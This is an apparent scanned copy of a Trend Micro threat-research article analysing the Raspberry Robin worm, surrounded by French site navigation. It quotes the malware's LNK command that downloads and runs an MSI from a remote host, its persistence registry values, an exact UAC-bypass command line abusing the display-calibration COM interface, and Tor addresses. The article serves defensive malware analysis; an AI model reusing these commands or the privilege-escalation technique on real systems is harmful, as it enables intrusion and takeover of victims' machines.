www.trendmicro.com
Open in
urlscan Pro
2.19.225.40
Public Scan
URL:
https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html
Submission: On November 06 via api from RU — Scanned from DE
Submission: On November 06 via api from RU — Scanned from DE
Form analysis 1 forms found in the DOM
<form class="main-menu-search" aria-label="Search Trend Micro">
<div class="main-menu-search__field-wrapper" id="cludo-search-form">
<table class="gsc-search-box">
<tbody>
<tr>
<td class="gsc-input">
<input type="text" class="gsc-input-field" name="search" title="search" placeholder="Search" autocomplete="off" aria-label="search">
</td>
</tr>
</tbody>
</table>
</div>
</form>Text Content
Entreprise
search close
* Solutions
* Par défi
* Par défi
* Par défi
En savoir plus
* Comprendre, hiérarchiser et limiter les risques
* Comprendre, hiérarchiser et limiter les risques
Améliorez votre niveau de risque avec la gestion de la surface
d'attaque
En savoir plus
* Protéger les applications natives du cloud
* Protéger les applications natives du cloud
Une sécurité qui favorise les résultats commerciaux
En savoir plus
* Protégez votre monde hybride
* Protéger votre monde hybride et multi-cloud
Gagnez en visibilité et répondez aux besoins commerciaux en toute
sécurité
En savoir plus
* Sécuriser votre personnel sans frontières
* Sécuriser votre personnel sans frontières
Connectez-vous en toute confiance depuis n’importe où, sur n’importe
quel appareil
En savoir plus
* Éliminer les zones d’ombre sur le réseau
* Éliminer les zones d’ombre sur le réseau
Sécurisez les utilisateurs et les opérations clés dans l’ensemble de
votre environnement
En savoir plus
* Améliorez votre visibilité. Réagissez plus rapidement.
* Améliorez votre visibilité. Réagissez plus rapidement.
Devancez vos adversaires grâce à une puissante solution XDR conçue sur
mesure, une gestion des risques liés à la surface d'attaque et des
fonctionnalités Zero Trust
En savoir plus
* Complétez votre équipe
* Complétez votre équipe Répondez aux menaces de manière agile
Maximisez l’efficacité avec la réduction proactive des risques et les
services gérés
En savoir plus
* Opérationnaliser le Zero Trust
* Opérationnaliser le Zero Trust
Comprenez votre surface d’attaque, évaluez vos risques en temps réel et
ajustez les politiques dans le réseau, les charges de travail et les
appareils, à partir d'une seule et même console
En savoir plus
* Par rôle
* Par rôle
* Par rôle
En savoir plus
* DSSI
* DSSI
Générez de la valeur commerciale avec des résultats de cybersécurité
mesurables
En savoir plus
* Responsable SOC
* Responsable SOC
Améliorez votre visibilité, agissez plus rapidement
En savoir plus
* Responsable d'infrastructure
* Responsable d'infrastructure
Faites évoluer votre sécurité pour atténuer les menaces de manière
rapide et efficace
En savoir plus
* Bâtisseur de cloud et développeur
* Bâtisseur de cloud et développeur
Assurez-vous que le code fonctionne uniquement comme prévu
En savoir plus
* Opérations de sécurité dans le cloud
* Opérations de sécurité dans le cloud
Gagnez en visibilité et en contrôle avec une sécurité conçue pour les
environnements cloud
En savoir plus
* Par secteur
* Par secteur
* Par secteur
En savoir plus
* Santé
* Santé
Protégez les données des patients, les équipements et les réseaux, tout
en respectant les réglementations
En savoir plus
* Fabrication
* Fabrication
Protection de vos environnements d'usine, des dispositifs traditionnels
aux infrastructures innovantes
En savoir plus
* Pétrole et gaz
* Pétrole et gaz
Sécurité ICS/OT pour le secteur du pétrole et du gaz
En savoir plus
* Électricité
* Électricité
Sécurité ICS/OT pour les acteurs de l'électricité
En savoir plus
* Automobile
* Automobile
En savoir plus
* 5G Networks
* 5G Networks
En savoir plus
* Sécurité des petites et moyennes entreprises
* Sécurité des petites et moyennes entreprises
Arrêtez les menaces grâce à des solutions simples d’utilisation, conçues
pour votre entreprise en développement
En savoir plus
* Plateforme
* Plateforme Vision One
* Plateforme Vision One
* Trend Vision One
Notre plateforme unifiée
Faites le lien entre protection contre les menaces et gestion des
cyber-risques
En savoir plus
* Companion IA
* Trend Vision One Companion
Votre assistant de cybersécurité fondé sur l’IA générative
En savoir plus
* Endpoint Security
* Endpoint Security
* Présentation d’Endpoint Security
Protéger les endpoints à chaque étape d’une attaque
En savoir plus
* Industrial Endpoint Security
* Industrial Endpoint Security
En savoir plus
* Workload Security
* Workload Security
Prévention, détection et réponse optimisées pour les endpoints, les
serveurs et les charges de travail cloud
En savoir plus
* Mobile Security
* Mobile Security
Protection sur site et dans le cloud contre les malwares, les
applications malveillantes et les autres menaces mobiles
En savoir plus
* XDR for Endpoint
* XDR for Endpoint
Barrez plus rapidement la route aux adversaires grâce à une perspective
plus étendue et à un meilleur contexte pour identifier, détecter, mener
une investigation et répondre aux menaces depuis une seule plateforme
En savoir plus
* Cloud Security
* Cloud Security
* Trend Vision One™
Présentation de Cloud Security
La plateforme de sécurité du cloud la plus fiable pour les
développeurs, les équipes de sécurité et les entreprises
En savoir plus
* Workload Security
* Workload Security
Sécurisez votre data center, votre cloud et vos conteneurs sans
compromis sur les performances en exploitant une plateforme de sécurité
cloud dotée de fonctionnalités CNAPP
En savoir plus
* Container Security
* Container Security
Simplifiez la sécurité pour vos applications natives du cloud avec une
analyse avancée des images de conteneur, un contrôle d'entrée basé sur
politique et une protection pour l'exécution de conteneur.
En savoir plus
* File Security
* File Security
Protégez le flux de travail des applications et le stockage cloud
contre les menaces avancées
En savoir plus
* Gestion des risques liés à la surface d'attaque pour le cloud
* Gestion des risques liés à la surface d'attaque pour le cloud
Détection des actifs cloud, hiérarchisation des vulnérabilités, gestion
de la posture de sécurité cloud et gestion de la surface d'attaque
tout-en-un
En savoir plus
* XDR pour le cloud
* XDR pour le cloud
Étendre la visibilité au cloud et simplifier les investigations dans le
SOC
En savoir plus
* Network Security
* Network Security
* Présentation de Network Security
Dopez la puissance de XDR avec une fonction de détection et de réponse
aux menaces sur le réseau
En savoir plus
* Network Intrusion Prevention (IPS)
* Network Intrusion Prevention (IPS)
Protégez-vous contre les vulnérabilités connues, inconnues et non
divulguées ciblant votre réseau.
En savoir plus
* Breach Detection System (BDS)
* Breach Detection System (BDS)
Détectez et neutralisez les attaques ciblées entrantes, sortantes et
internes
En savoir plus
* Secure Service Edge (SSE)
* Secure Service Edge (SSE)
Repensez le concept de confiance et sécurisez votre transformation
digitale à l’aide d’une évaluation permanente des risques
En savoir plus
* Industrial Network Security
* Industrial Network Security
En savoir plus
* XDR for Network
* XDR for Network
Barrez plus rapidement la route aux adversaires grâce à une perspective
plus étendue et à un meilleur contexte pour identifier, détecter, mener
une investigation et répondre aux menaces depuis une seule plateforme
En savoir plus
* 5G Network Security
* 5G Network Security
En savoir plus
* Tous les produits, services et évaluations
* Tous les produits, services et évaluations
En savoir plus
* Gestion de la surface d'attaque
* Gestion de la surface d'attaque
Arrêtez les violations avant qu’elles ne se produisent
En savoir plus
* Email Security
* Email Security
* Email Security
Empêcher le phishing (hameçonnage), les malwares, les ransomware, les
fraudes et les attaques ciblées d'infiltrer votre entreprise
En savoir plus
* Email and Collaboration Security
* Trend Vision One™
Email and Collaboration Security
Arrêtez le phishing, les ransomware et les attaques ciblées sur tous
les services de messagerie, notamment Microsoft 365 et Google Workspace
En savoir plus
* XDR (Extended Detection & Response)
* XDR (Extended Detection & Response)
Barrez plus rapidement la route aux adversaires grâce à une perspective
plus étendue et à un meilleur contexte pour identifier, détecter, mener
une investigation et répondre aux menaces depuis une seule plateforme
En savoir plus
* Threat Insights
* Threat Insights
Repérez les menaces de loin
En savoir plus
* OT Security
* OT Security
* OT Security
Découvrez les solutions pour la sécurité ICS/OT.
En savoir plus
* Industrial Endpoint Security
* Industrial Endpoint Security
En savoir plus
* Industrial Network Security
* Industrial Network Security
Industrial Network Security
* XDR for OT
* XDR for OT
Barrez plus rapidement la route aux adversaires grâce à une perspective
plus étendue et à un meilleur contexte pour identifier, détecter, mener
une investigation et répondre aux menaces depuis une seule plateforme
En savoir plus
* Identity Security
* Identity Security
Une sécurité des identités de bout en bout, de la gestion de la posture
d’identité à la détection et à la réponse
En savoir plus
* On-Premises Data Sovereignty
* Souveraineté des données sur site
Prévenez, détectez, répondez et protégez sans compromettre la
souveraineté des données
En savoir plus
* Recherche
* Recherche
* Recherche
* Recherche
En savoir plus
* Recherche, nouvelles et perspectives
* Recherche, nouvelles et perspectives
En savoir plus
* Recherche et analyse
* Recherche et analyse
En savoir plus
* Nouvelles relatives à la sécurité
* Nouvelles relatives à la sécurité
En savoir plus
* Programme Zero Day Initiative (ZDI)
* Programme Zero Day Initiative (ZDI)
En savoir plus
* Services
* Nos services
* Nos services
* Nos services
En savoir plus
* Packages de services
* Packages de services
Aidez les équipes de sécurité grâce à une détection, une réponse et un
support managés 24 h/24, 7 j/7 et 365 j/365
En savoir plus
* Managed XDR
* Managed XDR
Affinez la détection des menaces avec un service managé de détection et
de réponse (Managed Detection and Response, MDR) pour les emails, les
endpoints, les serveurs, les instances cloud et les réseaux
En savoir plus
* Services de support
* Services de support
En savoir plus
* Réponse aux incidents
* Réponse aux incidents
* Réponse aux incidents
Nos experts de confiance sont disponibles, que vous subissiez une
violation ou cherchiez à améliorer proactivement vos plans IR.
En savoir plus
* Compagnies d'assurance et cabinets d'avocats
* Compagnies d'assurance et cabinets d'avocats
Stoppez les violations grâce à la meilleure technologie de réponse et
de détection sur le marché, réduisez les temps d'arrêt pour les
clients et récupérez des coûts
En savoir plus
* Partenaires
* Partenaires d'alliance
* Partenaires d'alliance
* Partenaires d'alliance
Nous travaillons avec les meilleurs pour vous aider à optimiser vos
performances et votre création de valeur
En savoir plus
* Partenaires technologiques
* Partenaires technologiques
En savoir plus
* Trouver des partenaires d'alliance
* Trouver des partenaires d'alliance
En savoir plus
* Trouver des partenaires
* Trouver des partenaires
Localiser un partenaire auprès duquel vous pouvez acheter des solutions
Trend Micro
En savoir plus
* Programme de partenariat
* Programme de partenariat
* Vue d’ensemble du programme de partenariat
Développez votre activité et protégez vos clients grâce à une sécurité
intégrale et en profondeur
En savoir plus
* Compétences des partenaires
* Compétences des partenaires
Démarquez-vous auprès des clients grâce à des validations de compétence
qui mettent en avant votre expertise
En savoir plus
* Fournisseur de services de sécurité managés
* Fournisseur de services de sécurité managés
Fournissez des services d’opérations de sécurité modernes avec notre
XDR leader du secteur
En savoir plus
* Fournisseur de services managés
* Fournisseur de services managés
Devenez partenaire d’un expert leader en cybersécurité et exploitez des
solutions éprouvées conçues pour les MSP
En savoir plus
* Réussite des partenaires
* Réussite des partenaires
En savoir plus
* Ressources des partenaires
* Ressources des partenaires
* Ressources des partenaires
Découvrez les ressources conçues pour accélérer la croissance de votre
entreprise et améliorer vos capacités en tant que partenaire Trend
Micro
En savoir plus
* Devenir partenaire
* Devenir partenaire
En savoir plus
* Campus Trend
* Campus Trend
Accélérez votre apprentissage avec le Campus Trend, une plateforme
éducative simple d’utilisation qui propose des conseils techniques
personnalisés
En savoir plus
* Co-vente
* Co-vente
Accédez à des services collaboratifs conçus pour vous aider à démontrer
la valeur de Trend Vision One™ et à développer votre activité
En savoir plus
* Distributeurs
* Distributeurs
En savoir plus
* Connexion au portail des partenaires
* Connexion au portail des partenaires
Connexion
* Entreprise
* Pourquoi choisir Trend Micro
* Pourquoi choisir Trend Micro
* Pourquoi choisir Trend Micro
En savoir plus
* Témoignages de clients
* Témoignages de clients
En savoir plus
* Récompenses de l'industrie
* Récompenses de l'industrie
En savoir plus
* Alliances stratégiques
* Alliances stratégiques
En savoir plus
* Comparez Trend Micro
* Comparez Trend Micro
* Comparez Trend Micro
Découvrez comment Trend dépasse la concurrence
Allons-y
* par rapport à CrowdStrike
* Trend Micro par rapport à CrowdStrike
Crowdstrike fournit une cybersécurité efficace via sa plateforme native
du cloud, mais ses tarifs peuvent mettre les budgets à rude épreuve, en
particulier pour les organisations qui recherchent une évolutivité
économique sur une seule plateforme.
Allons-y
* par rapport à Microsoft
* Trend Micro par rapport à Microsoft
Microsoft offre une couche de protection de base, mais nécessite
souvent l’ajout d'autres solutions pour traiter entièrement les
problèmes de sécurité des clients
Allons-y
* par rapport à Palo Alto Networks
* Trend Micro par rapport à Palo Alto Networks
Palo Alto Networks fournit des solutions de cybersécurité avancées,
mais il peut être difficile de parcourir sa suite complète et
l’exploitation de toutes ses fonctionnalités requiert un investissement
important.
Allons-y
* À propos
* À propos
* À propos
En savoir plus
* Trust Center
* Trust Center
En savoir plus
* Historique
* Historique
En savoir plus
* Diversité équité et inclusion
* Diversité équité et inclusion
En savoir plus
* Responsabilité sociale d’entreprise
* Responsabilité sociale d’entreprise
En savoir plus
* Leadership
* Leadership
En savoir plus
* Experts en sécurité
* Experts en sécurité
En savoir plus
* Sensibilisation à la sécurité sur Internet et à la cybersécurité
* Sensibilisation à la sécurité sur Internet et à la cybersécurité
En savoir plus
* Mentions légales
* Mentions légales
En savoir plus
* Course de Formule E
* Course de Formule E
En savoir plus
* Communiquez avec nous
* Communiquez avec nous
* Communiquez avec nous
En savoir plus
* Salle de presse
* Salle de presse
En savoir plus
* Événements
* Événements
En savoir plus
* Carrières
* Carrières
En savoir plus
* Webinaires
* Webinaires
En savoir plus
Back
Back
Back
Back
* Évaluation gratuite
* Nous contacter
Vous recherchez des solutions domestiques ?
Vous subissez une attaque ?
0 Alertes
Back
Non lu
Tous
Folio (0)
Support
* Portail de support professionnel
* Formations et certifications
* Contacter le support
* Trouver un partenaire de support
Ressources
* AI Security
* Trend Micro par rapport à la concurrence
* Évaluation/indice d’exposition aux cyber-risques
* Qu’est-ce que c’est ?
* Encyclopédie des menaces
* Cyber-assurance
* Glossaire de termes
* Webinaires
Connexion
* Vision One
* Support
* Portail partenaires
* Cloud One
* Activation et gestion de produit
* Associé parrainé
Back
arrow_back
search
close
Content has been added to your Folio
Go to Folio (0) close
Programmes malveillants
RASPBERRY ROBIN MALWARE TARGETS TELECOM, GOVERNMENTS
We found samples of the Raspberry Robin malware spreading in telecommunications
and government office systems beginning September. The main payload itself is
packed with more than 10 layers for obfuscation and is capable of delivering a
fake payload once it detects sandboxing and security analytics tools.
By: Christopher So December 20, 2022 Read time: 10 min (2639 words)
Save to Folio
Subscribe
--------------------------------------------------------------------------------
We found a malware sample allegedly capable of connecting to the Tor network to
deliver its payloads. Our initial analysis of the malware, which compromised a
number of organizations toward the end of September, showed that while the main
malware routine contains both the real and fake payloads, it loads the fake
payload once it detects sandboxing tools to evade security and analytics tools
from detecting and studying the malware's real routine. Meanwhile, the real
payload remains obfuscated under packing layers and subsequently connects to the
Tor network. The campaign and malware, identified as Raspberry Robin by Red
Canary (detected by Trend Micro as Backdoor.Win32.RASPBERRYROBIN.A), seemingly
spreads to systems with worm-like capabilities (due to the use of .lnk files)
via an infected USB.
Given the malware’s layering features and the stages of its infection routine,
we are still confirming its main motivation for deployment. Currently, its
possible motivation ranges from theft to cyberespionage. So far, we have noted
the malware’s capability to hide itself via multiple layers for obfuscation, as
well as its feature of delivering a fake payload once the routine detects
sandboxing and analysis solutions. The group behind Raspberry Robin appears to
be testing the waters to see how far its deployments can spread. Majority of the
group’s victims are either government agencies or telecommunication entities
from Latin America, Oceania (Australia), and Europe. Given the varying samples
we have acquired since detecting these deployments, we are continuing to monitor
the developments for this malware as they occur.
Figure 1. Percentage of Raspberry Robin detections worldwide from October to
November
Arrival routine
Figure 2. Raspberry Robin infection routine
Once the user connects the infected USB to the system, Raspberry Robin initially
arrives as a shortcut or LNK file. The LNK file contains a command line that
runs a legitimate executable to download a Windows Installer (MSI) package. This
legitimate executable is usually msiexec.exe, but we have also seen wmic.exe
used in other samples.
Figure 3. File containing a command line to run an executable
With obfuscation removed, the LNK file contains a target similar to the format
"cmd.exe /c start msiexec {URL}". When the LNK file is double-clicked, the
Windows Shell "opens" the shortcut file. In this case, "open" would mean
"execute" since the first item in the target is an executable file (cmd.exe).
Cmd.exe then interprets anything after the switch /c as a command and executes
it as if it was typed directly in a Command Prompt window. After executing the
command, it exits. In this case, the command is "start msiexec {URL}".
When opened, it causes the target executable (cmd.exe) to execute with its
parameters; the target executable is the URL where the MSI file is hosting the
main malware. The "start" command is commonly used to execute another program
without waiting for it to exit. If it did not use "start", cmd.exe will have to
wait for msiexec to terminate before terminating itself. The malware is
downloaded, treats the downloaded data as an MSI (Windows Installer) file and,
if successful, is loaded by the legitimate executable file. The downloaded link
has the following format:
* http[:]//{domain}:8080/{random strings and /}/<computer name>
* http[:]//{domain}:8080/{random strings and /}/<computer name>=<user name>
* http[:]//{domain}:8080/{random strings and /}/<computer name>?<user name>
The slashes in the LNK are a combination of forward slashes (/) and backslashes
(\). The domain is typically composed of two to four alphanumeric characters,
followed by a dot and two additional characters.
Main malware
To prevent researchers from analyzing this malware, Raspberry Robin’s main
malware itself is packed multiple times, with each layer heavily obfuscated.
Code obfuscation
The code is obfuscated in different ways. Starting from the third layer, each
subroutine can be thought of as a state machine and implemented as a loop. At
the start of each subroutine, the table of values is decrypted. This table of
values serves as a container for constant values used in the subroutine, as well
as the state transition table.
Figure 4. Each subroutine implemented as a loop
Another obfuscation technique used to hide the main malware obfuscates the call
to other subroutines. In regular programs, the address of another subroutine is
in the call itself. In this malware, however, the address is computed using
hard-coded values and values from the previously mentioned decrypted table of
values. The result of this is placed in a register, and an indirect call is made
using the register.
Figure 5. Computing for the address using hard-coded values and table of values
Packer characteristics
This malware is composed of two payloads embedded in a payload loader packed six
times.
Figure 6. A visual representation of the Raspberry Robin’s packing
The first and second layers belong to a single packer. The code at the entry
point of the first layer only has four instructions:
1. A sequence of a call to unpack the embedded loader
2. A sequence to unpack the payload
3. A jump to the loader, setting the return value to 1
4. The return instruction
In reality, however, this layer is typically obfuscated as shown by this code
snippet:
Figure 7. First and second layer packing
Dumping the second layer, we saw that the third layer is located just after the
second layer code, at offset 0x3F0:
Figure 8. Dumping the second layer and going to the third
We noted layers 3 and 5 as capable of anti-analysis techniques. Meanwhile, we
found that not all layers have unique packers. The fourth and seventh layers are
identical, as well as the tenth and thirteenth. The packing of the eighth and
fourteenth layers are also similar. This repeated use of packers implies that
the group is using a separate packing program. We are continuing with our
analysis to see if this program is their own or if it is outsourced to other
groups, as this technique can be indicative of the group’s future use of these
same packers. It is also possible for these same packers to be replaced with
variations in patterns.
On layer 8, the payload loader, the execution splits into two paths. If the
malware detects that it is being analyzed, it loads the fake payload. Otherwise,
it loads the real payload.
FAKE PAYLOAD
The fake payload has two layers, the first of which is a shellcode with an
embedded PE file, while the second layer is a PE file with the MZ header and PE
signature removed. The second layer is loaded by the first layer and jumps into
it.
Upon execution, the second layer immediately creates a thread to where its main
routine is located. It first attempts to read the registry value named “Active”
at <HKEY_CURRENT_USER\SOFTWARE\Microsoft\Media>. This serves as an infection
marker. If the read fails, it proceeds to write the string value “1” into this
registry value, then gathers system information: the computer name, current
username, processor brand, and display device names. In some versions of the
fake payload, the data is encrypted using RC4 with a hard-coded key. The system
information is then appended to the URL http[:]//{IP address}:8080/. The full
URL is then accessed, and a file is downloaded. In some versions of the malware,
this downloaded file is also executed.
Analyzing other sample versions of the fake payload, we found that if the main
routine is successful, it checks if the system is linked to a domain by checking
the existence of the environment variable USERDNSDOMAIN. If this variable does
not exist, it drops and executes an adware named BrowserAssistant to %User
Temp%\{random number}.exe, likely to make an analyst feel complacent about
allegedly already finding the payload and therefore no longer needing to conduct
further studies of the samples.
Real payload
The real payload is made up of three layers, with the third layer containing the
actual payload binary packed twice. Within the real payload is an embedded
custom Tor client designed to communicate with the real payload using shared
memory.
Installation
Its method for checking whether the malware has been installed on the system
involves checking if it is running in Session 0. Prior to Windows Vista,
services were run in the session of the first user to log in to the system,
which is called Session 0. However, from Windows Vista onward, Microsoft
introduced a security enhancement called “Session 0 Isolation,” where Session 0
is now reserved for services and other non-interactive user applications.
With this security enhancement, the threat actor confirms whether the user
profile is running on administrative privileges or not. If it is not in Session
0, it drops a copy of itself in <%ProgramData%\{random folder name}\{random file
name}.{extension}> to elevate privileges, or <%ProgramData%\Microsoft\{random
folder name}\{random file name}.{extension}> if the user is running as an admin.
In this manner, a security analyst would view the malicious routine as having
been started and run by a legitimate Windows process, allowing the routine to
evade detection.The extension name is randomly chosen among the following:
* .bak
* .dat
* .db
* .dmp
* .etl
* .idx
* .json
* .lkg
* .lock
* log
* .man
* .tmp
* txt
* .vdm
* .xml
* .xsd
It also sets the following registry entry to enable its automatic execution at
system startup. If the user is not at an admin level, the malware modifies the
registry with
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
{random value name} = “rundll32 shell32 ShellExec_RunDLLA REGSVR /u /s “{dropped
copy path and file name}.””
Inversely, if the user’s profile is with admin privileges, the registry is
modified with
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\{random
key name}
{random value name} = “shell32|ShellExec_RunDLLA|REGSVR /u /s “{dropped copy
path and file name}.””
Privilege escalation
After dropping a copy of itself, it executes the dropped copy as Administrator
using a UAC (User Account Contorl) bypass technique. It implements a variation
of the technique ucmDccwCOMMethod in UACMe, thereby abusing the built-in Windows
AutoElevate backdoor.
It first checks whether atcuf32.dll, aswhook.dll, and avp.exe are loaded in the
system. These files are from security defenders BitDefender, Avast, and
Kaspersky, respectively. If one of these is loaded, it does not proceed to the
UAC bypass routine. It then drops a shortcut file to <%User Temp%\{random file
name}.lnk> that contains the command line
rundll32.exe SHELL32,ShellExec_RunDLL "C:\Windows\system32\ODBCCONF.EXE" /a
{configsysdsn OCNKBENXGMI etba odjcnr} /A {installtranslator fxodi} -a
{installdriver qmprmxf} /a {configsdn HHAP} regsvr "{dropped copy path and file
name}." /S /e -s
It then creates an elevated COM object for CMLuaUtil and uses it to set a custom
display calibrator in the registry that points to the dropped LNK file. It sets
the custom display calibrator by setting the registry value
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ICM\Calibration
DisplayCalibrator = "%User Temp%\{random file name}.lnk"
It then creates an elevated COM object for ColorDataProxy and calls its method
“LaunchDccw” to load the calibrator, thus executing the malicious LNK.
Afterward, it sets the registry value DisplayCalibrator to
“%SystemRoot%\System32\DCCW.exe” to hide its activity.
Main routine
Running in Session 0, the real payload attempts to connect to the hard-coded Tor
addresses, where the connections are made in another process. For the real
payload to facilitate the exchange of information and the Tor-connecting
process, a shared-named memory map is created with the following format:
Table 1. Shared memory map format Offset Size Description 00h 1 Flag 01h 1
Success 04h 4 (DWORD) IP address 08h 8 (FILETIME) 10h 4 (DWORD) Data size 14h
Data size Data
The Tor address is written to offset 14h of the shared memory, hard-coded but
encrypted within the sample itself. The following are some of the .onion (V2)
addresses we identified:
* sejnfjrq6szgca7v
* zdfsyv3rubuhpql3
* ihdhoeoovbtgutfm
* tapeucwutvne7l5o
* 2qlvvvnhqyda2ahd
* answerstedhctbek
* 5j7saze5byfqccf3
* cmgvqnxjoiqthvrc
* 3bbaaaccczcbdddz
* sgvtcaew4bxjd7ln
* ugw3zjsayleoamaz
* ynvs3km32u33agwq
* njalladnspotetti
* psychonaut3z5aoz
* habaivdfcyamjhkk
* torwikignoueupfm
* bitmailendavkbec
* cyphdbyhiddenbhs
* clgs64523yi2bkhz
* 76qugh5bey5gum7l
* hd37oiauf5uoz7gg
* expressobutiolem
* gl3n4wtekbfaubye
* archivecaslytosk
* kyk55bof3hzdiwrm
* qqvyib4j3fz66nuc
* bcwpy5wca456u7tz
* pornhubthbh7ap3u
* fncuwbiisyh6ak3i
In starting its Tor client process, the real payload randomly selects a name
among these first:
* dllhost.exe
* regsvr32.exe
* rundll32.exe
It then creates a suspended process, injects the code of the Tor client, resumes
the process, and waits for data from the Tor client. As far as what the sample
does to the received data, we have not seen any use of it in the wild so far
since we did find that the buffer containing the data is freed without using it.
Tor client
The Tor client itself is composed of four layers. The first two layers are
packer codes. The third layer retrieves the Tor address from the shared memory,
unpacks the fourth layer, and calls the fourth layer to do the actual Tor
communication. The data received by the fourth layer is encrypted by the third
layer and written to the shared memory, to be read by the main routine.
Conclusion
Noticeably, the malware uses many anti-analysis techniques, while its main
payload is packed with many layers that require analysis. Therefore, an analyst
who lacks experience will find only the fake payload. Clearly, the actor behind
this has made considerable effort to hinder analysis.
While the technique of packing the codes is not unique, some of the packing
layers have very similar codes and can be grouped into packer families. The
style of packing is also similar on all layers except for the first two: An
executable is stripped of some header information, encrypted, and added to the
unpacking code. The group must therefore be using something akin to a packed
sample generator, which takes a payload executable and produces a multi-layered
packed sample. On the surface, it looks like the group could be providing this
as "packing service" or "executable packing-as-a-service" (if there is such a
term), and the people behind this could be associated with the threat actors
behind LockBit. We continue to analyze and document all the anti-debugging
techniques and layers used in these samples and incidents.
The use of Session 0 is also sophisticated. The purpose of Session 0 Isolation
is to increase system security by preventing services running in the local
system account having user interactions. Isolating services in their own
non-interactive sections inaccessible by regular processes will decrease the
chances of abuse to elevate another piece of (malicious) code's privileges.
Hence, having access to Session 0 would mean privilege escalation. However, an
attacker must use privilege escalation techniques to gain access.
From the samples we gathered, we found the abuse of the elevated COM interface.
Making one of those elevated COM classes execute the code implies that the
malicious actor’s access is also automatically elevated, provided the threat
actor finds the specific COM class that can accept a program name (or something
similar) and trigger it to run. In this case, it's Image Color Management.
Display calibration is done by a program that is specified in a registry entry.
By replacing or adding that entry and then triggering the system to perform
display calibration, whatever is specified in that registry entry will be
executed.
It is also noteworthy that the ICM calibration technique was previously seen in
the LockBit ransomware as far as privilege escalation is concerned. There is
also the similarity of the anti-debugging technique using
ThreadHideFromDebugger. However, even if Raspberry Robin uses the same
techniques, we cannot conclude for certain that the actors behind LockBit and
Raspberry Robin are the same. Still, since LockBit operates as a
ransomware-as-a-service (RaaS) group, some of the following could still be true:
* The group behind LockBit is also behind Raspberry Robin.
* The group behind Raspberry Robin is the maker of some of the tools LockBit is
also using.
* The group behind Raspberry Robin availed of the services of the affiliate
responsible for the techniques used by LockBit.
Given that the returned data is empty and was not used, it seems that the actor
has been trying to see how far its campaign operation can spread, most likely as
part of its reconnaissance effort. We can thus consider this an indication of a
possible routine for the group’s long-term plans, as well as a possible
precursor to a follow-up operation in the future.
Indicator of Compromise (IOC)
SHA256 Description Detection name
6fb0ad3f756b5d1f871cf34c3e4ea47cb34643cd17709a09c25076c400313adf Main malware
executable Backdoor.Win32.RASPBERRYROBIN.A
Tags
Programmes malveillants | Attaques ciblées & APT | Endpoints | Cybercrime |
Articles, nouveautés, rapports
AUTHORS
* Christopher So
Threat Researcher
Contact Us
Subscribe
RELATED ARTICLES
* Analyzing How TeamTNT Used Compromised Docker Hub Accounts
* Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral
Movement
* Abusing a GitHub Codespaces Feature For Malware Delivery
See all articles
Testez gratuitement notre plateforme unifiée
* Demandez votre évaluation de 30 jours
*
*
*
*
*
RESSOURCES
* Blog
* Salle de presse
* Rapports sur les menaces
* Trouver un partenaire
*
*
SUPPORT
* Portail de support professionnel
* Nous contacter
* Téléchargements
* Évaluation gratuite
*
*
À PROPOS DE TREND
* À propos
* Carrières
* Présence
* Événements à venir
* Trust Center
*
Siège social national
Trend Micro - France (FR)
85, rue Albert Premier
92500 Rueil Malmaison
France
Téléphone: +33 (0)1 76 68 65 00
Sélectionnez un pays/une région
France expand_more
close
AMÉRIQUE
* États-Unis
* Brésil
* Canada
* Mexique
MOYEN-ORIENT ET AFRIQUE
* Afrique du Sud
* Moyen-Orient et Afrique du Nord
EUROPE
* België (Belgique)
* Česká Republika
* Danmark
* Deutschland, Österreich, Schweiz
* España
* France
* Ireland
* Italia
* Nederland
* Norge (Norvège)
* Polska (Pologne)
* Suomi (Finlande)
* Sverige (Suède)
* Türkiye (Turquie)
* Royaume-Uni
ASIE-PACIFIQUE
* Australie
* Центральная Азия (Asie centrale)
* Hong Kong (anglais)
* 香港 (中文) (Hong Kong)
* भारत गणराज्य (Inde)
* Indonesia
* 日本 (Japon)
* 대한민국 (Corée du Sud)
* Malaisie
* Монголия (Mongolie) et рузия (Géorgie)
* Nouvelle-Zélande
* Philippines
* Singapore
* 台灣 (Taïwan)
* ประเทศไทย (Thaïlande)
* Việt Nam
Confidentialité | Dispositions légales | Plan du site
Copyright © 2024 Trend Micro Incorporated. Tous droits réservés
Copyright © 2024 Trend Micro Incorporated. Tous droits réservés
sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk
This website uses cookies for website functionality, traffic analytics,
personalization, social media functionality and advertising. Our Cookie Notice
provides more information and explains how to amend your cookie settings.Learn
more
Cookies Settings Accept
✓
Danke für das Teilen!
AddToAny
Mehr…
BDOW!
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1